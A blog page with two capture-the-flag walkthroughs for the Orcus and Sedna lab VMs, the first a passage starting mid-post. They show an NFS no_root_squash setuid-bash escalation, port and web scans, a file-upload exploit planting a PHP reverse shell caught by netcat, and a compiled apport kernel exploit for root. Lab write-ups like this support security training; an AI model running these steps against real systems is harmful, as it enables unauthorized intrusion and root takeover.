ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$
view raw orcus: limited_shell hosted with ❤ by GitHub

With the first flag in the bag let try and root on this box. It took me a while to root this box. I kept going away trying privilege escalation exploits. Until today morning I came back to my nmap scans and found this

2049/tcp open  nfs_acl     2-3 (RPC #100227)

wonder why that didn't stick out to me in the first place. I quickly run showmount.

root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *
 
I then checked /etc/exports file and found that the NFS shares were configured with no_root_squash

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)

On our kali box, we mount the partition
root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter
On our limited shell on Orcus we copy our bash shell into our newly created world writable /tmp/rooter 
www-data@Orcus:/$ cp /bin/bash /tmp/rooter
we head back to our Kali box and set the seguid bit on the /tmp/rooter file (shell)
root@kali:~# chmod 4777 /mnt/orcus/rooter
we head into the the /tmp folder and check to make sure the the bit has been set and then execute the rooter with the -p option in order to preserve the previleges which gets us root privileges. :-)


www-data@Orcus:/$ ls -al
total 1124
drwxrwxrwt 10 root root 4096 Mar 27 08:45 .
drwxr-xr-x 24 root root 4096 Oct 30 23:05 ..
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .ICE-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .Test-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .X11-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .XIM-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .font-unix
-rwsrwxrwx 1 root root 1109564 Mar 27 08:50 rooter
drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-dovecot.service-YyhShT
drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-systemd-timesyncd.service-ENaVWk
drwx------ 2 root root 4096 Mar 27 08:36 vmware-root
www-data@Orcus:/$ ./rooter -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
ls
flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe
view raw orcus:rooting hosted with ❤ by GitHub

It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.
Posted by at No comments:

Monday, March 20, 2017

Solving hackfest2016: Sedna VM

First scanned the box.

root@kali:/tmp# nmap -sT -A -P0 172.16.94.135
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 14:29 EDT
Nmap scan report for 172.16.94.135
Host is up (0.00055s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38660/udp status
|_ 100024 1 46739/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:68:AD:36 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-17T14:31:40-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 172.16.94.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.99 seconds
root@kali:~# us -mT -Iv 172.16.94.135:a -r 3000 -R 3 && us -mU -Iv 172.16.94.135:a -r 3000 -R 3
adding 172.16.94.135/32 mode `TCPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
TCP open 172.16.94.135:22 ttl 64
TCP open 172.16.94.135:995 ttl 64
TCP open 172.16.94.135:111 ttl 64
TCP open 172.16.94.135:8080 ttl 64
TCP open 172.16.94.135:139 ttl 64
TCP open 172.16.94.135:110 ttl 64
TCP open 172.16.94.135:53 ttl 64
TCP open 172.16.94.135:993 ttl 64
TCP open 172.16.94.135:445 ttl 64
TCP open 172.16.94.135:143 ttl 64
TCP open 172.16.94.135:50201 ttl 64
TCP open 172.16.94.135:80 ttl 64
sender statistics 1908.1 pps with 196608 packets sent total
listener statistics 409090 packets recieved 0 packets droped and 0 interface drops
TCP open ssh[ 22] from 172.16.94.135 ttl 64
TCP open domain[ 53] from 172.16.94.135 ttl 64
TCP open http[ 80] from 172.16.94.135 ttl 64
TCP open pop3[ 110] from 172.16.94.135 ttl 64
TCP open sunrpc[ 111] from 172.16.94.135 ttl 64
TCP open netbios-ssn[ 139] from 172.16.94.135 ttl 64
TCP open imap[ 143] from 172.16.94.135 ttl 64
TCP open microsoft-ds[ 445] from 172.16.94.135 ttl 64
TCP open imaps[ 993] from 172.16.94.135 ttl 64
TCP open pop3s[ 995] from 172.16.94.135 ttl 64
TCP open http-alt[ 8080] from 172.16.94.135 ttl 64
TCP open unknown[50201] from 172.16.94.135 ttl 64
adding 172.16.94.135/32 mode `UDPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
UDP open 172.16.94.135:53 ttl 64
UDP open 172.16.94.135:111 ttl 64
UDP open 172.16.94.135:137 ttl 64
UDP open 172.16.94.135:5353 ttl 255
sender statistics 1732.9 pps with 196635 packets sent total
listener statistics 36 packets recieved 0 packets droped and 0 interface drops
UDP open domain[ 53] from 172.16.94.135 ttl 64
UDP open sunrpc[ 111] from 172.16.94.135 ttl 64
UDP open netbios-ns[ 137] from 172.16.94.135 ttl 64
UDP open mdns[ 5353] from 172.16.94.135 ttl 255
view raw nmap hosted with ❤ by GitHub
root@kali:/tmp# nikto -h http://172.16.94.135
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 80
+ Start Time: 2017-03-17 14:37:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-03-17 14:38:32 (GMT-4) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/tmp# nikto -h http://172.16.94.135:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 8080
+ Start Time: 2017-03-17 14:39:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-03-17 14:40:30 (GMT-4) (41 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
view raw nikto hosted with ❤ by GitHub
As I was clicking around i found this. http://172.16.94.135/files/be_demo/blog/categories/newlogo.jpg
With this I searched exploit-db and found this. I first tried to upload directly using the firefox plugin Poster but the uploads kept getting renamed and php extension were being filtered somehow.
So i decided to try and upload the exploit first then use it to upload the php-reverse-shell. This got me a limited shell on the system.
root@kali:/tmp# nc -lvp 443
listening on [any] 443 ...
172.16.94.135: inverse host lookup failed: Unknown host
connect to [172.16.94.130] from (UNKNOWN) [172.16.94.135] 58774
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
14:57:01 up 2 days, 20 min, 0 users, load average: 0.00, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
www-data@Sedna:/var/www$
view raw rev_shell hosted with ❤ by GitHub
For privilege escalation I used taviso's exploit [CVE-2015-1318 newpid (apport)] The link to the exploit can be found here.
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid
gcc newpid.c -o newpid
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
newpid: you *must* compile with -static
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid -static
gcc newpid.c -o newpid -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# pwd
pwd
/tmp/sploits/expl
# cd /root
cd /root
# ls
ls
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt
# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305
#
view raw rooting hosted with ❤ by GitHub
Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.
Posted by at No comments:
Subscribe to: Posts (Atom)